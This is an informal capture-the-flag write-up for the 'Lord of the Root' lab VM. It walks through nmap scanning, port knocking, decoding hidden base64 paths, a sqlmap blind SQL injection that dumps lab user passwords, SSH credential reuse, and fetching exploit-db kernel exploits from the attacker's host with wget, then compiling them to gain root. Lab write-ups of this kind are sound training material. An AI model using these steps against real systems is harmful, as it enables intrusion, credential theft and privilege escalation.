Welcome to the Lord of the root CTF created by Kooksec and stumbled through by me.
Ok first things first, the chocolate starfish is my man fred durst. Lets get an IP with netdiscover.
Once we have that lets run a full scan on it with nmap
nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20
ok so not much really going on, just port 22 for ssh.
root@kali:~# nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20 Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-29 05:33 EST Nmap scan report for 192.168.128.20 Host is up (0.00042s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA) | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA) | 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA) |_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (EdDSA) MAC Address: 08:00:27:AC:E1:23 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Lets try sshing to that port and see what happens. im going to provide a screen shot cause there is some baller ASCII art on this page that doesn’t format correctly.
root@kali:~# ssh 192.168.128.20 The authenticity of host '192.168.128.20 (192.168.128.20)' can't be established. ECDSA key fingerprint is SHA256:XzDLUMxo8ifHi4SciYJYj702X3PfFwaXyKOS07b6xd8. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.128.20' (ECDSA) to the list of known hosts. Easy as 1,2,3 firstname.lastname@example.org's password:
This looks like port knocking, which is the method of security through obscurity, you use ports as a sort of combination lock, accessing certain ports in a particular order unlocks a hidden service/port.
I ran the below commands, and then read the rest of the article and realized i could have scripted it, so, RTFM kids.
root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 1 192.168.128.20 #knocking port 1 root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 2 192.168.128.20 #knocking port 2 root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 3 192.168.128.20 #knocking port 3
After re-scanning i can see there is another port open! an apache web server on port 1337
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
I navigate there and success! found a webpage.
Lmao. Ok, lets try the /robots.txt and /index, its the same page, lets inspect.
I found this in the page source, which looks like a base64 encoded string.
<html> <img src="/images/hipster.jpg" align="middle"> <!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh> </html>
So lets decode with an online decoder because echo x | base64 -d didnt work.
Amazing, ok, that also looks like a base64 encoded string, and this time the command worked, so, something to look into later..
root@kali:~# echo Lzk3ODM0NTIxMC9pbmRleC5waHA= | base64 -d /978345210/index.php
Jackpot, a log in page.
Ok so this looks likes vulnerable to sql injection.
i opened burpsuite to intercept a a request, and then using the sqlmap wizard entered the following commands.
root@kali:~# sqlmap --wizard [07:02:26] [INFO] starting wizard interface Please enter full target URL (-u): http://192.168.128.20:1337/978345210/index.php POST data (--data) [Enter for None]: username=test&password=password&submit=+Login+ Injection difficulty (--level/--risk). Please choose:  Normal (default)  Medium  Hard > 2 Enumeration (--banner/--current-user/etc). Please choose:  Basic (default)  Intermediate  All > 3
This ran and identified that the database was vulnerable to a time base blind attack. Which then ran and found the following user credentials.
Database: Webapp Table: Users [5 entries] +----+----------+------------------+ | id | username | password | +----+----------+------------------+ | 1 | frodo | iwilltakethering | | 2 | smeagol | MyPreciousR00t | | 3 | aragorn | AndMySword | | 4 | legolas | AndMyBow | | 5 | gimli | AndMyAxe | +----+----------+------------------+
logging in with any of these credentials yields the same, slightly less hilarious each time meme account page.
But! lets try those same login crdedentials for the SSH server…
Frodo did not work but smeagol got us sshed into the box, and some more baller ass ASCII art
doing some basic linux recon i used the uname -a to find out what version, it looks like its using a version of linux ive already privilege escalated on, which is handy.
I found the same privilege escalation exploit here and started a simpleHTTPserver in my home directory with python, then used wget to transfer it to the /tmp folder on the target.
root@kali:~# python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... 192.168.128.20 - - [07/Dec/2018 02:02:28] "GET /37292.c HTTP/1.1" 200 -
smeagol@LordOfTheRoot:/var/tmp$ wget http://192.168.128.10:8000/37292.c --2018-12-04 20:17:31-- http://192.168.128.10:8000/37292.c Connecting to 192.168.128.10:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 5119 (5.0K) [text/plain] Saving to: ‘37292.c’ 100%[================================================================================================>] 5,119 --.-K/s in 0s 2018-12-04 20:17:31 (666 MB/s) - ‘37292.c’ saved [5119/5119] smeagol@LordOfTheRoot:/var/tmp$
After this is compile and execute it. However it failed..
smeagol@LordOfTheRoot:/var/tmp$ gcc 37292.c -o pwned smeagol@LordOfTheRoot:/var/tmp$ ./pwned spawning threads mount #1 mount #2 child threads done exploit failed smeagol@LordOfTheRoot:/var/tmp$ whoami smeagol
I jumped back on exploitDB and eventually found another exploit.
smeagol@LordOfTheRoot:/var/tmp$ gcc 39166.c -o pwn smeagol@LordOfTheRoot:/var/tmp$ ./pwn root@LordOfTheRoot:/var/tmp# id uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
this time it executed fine and gave me root access! after navigating to the root folder i found the final flag.
root@LordOfTheRoot:~/Documents# cd /root root@LordOfTheRoot:/root# pwd /root root@LordOfTheRoot:/root# ls buf buf.c Flag.txt other other.c switcher.py root@LordOfTheRoot:/root# cat Flag.txt “There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf root@LordOfTheRoot:/root#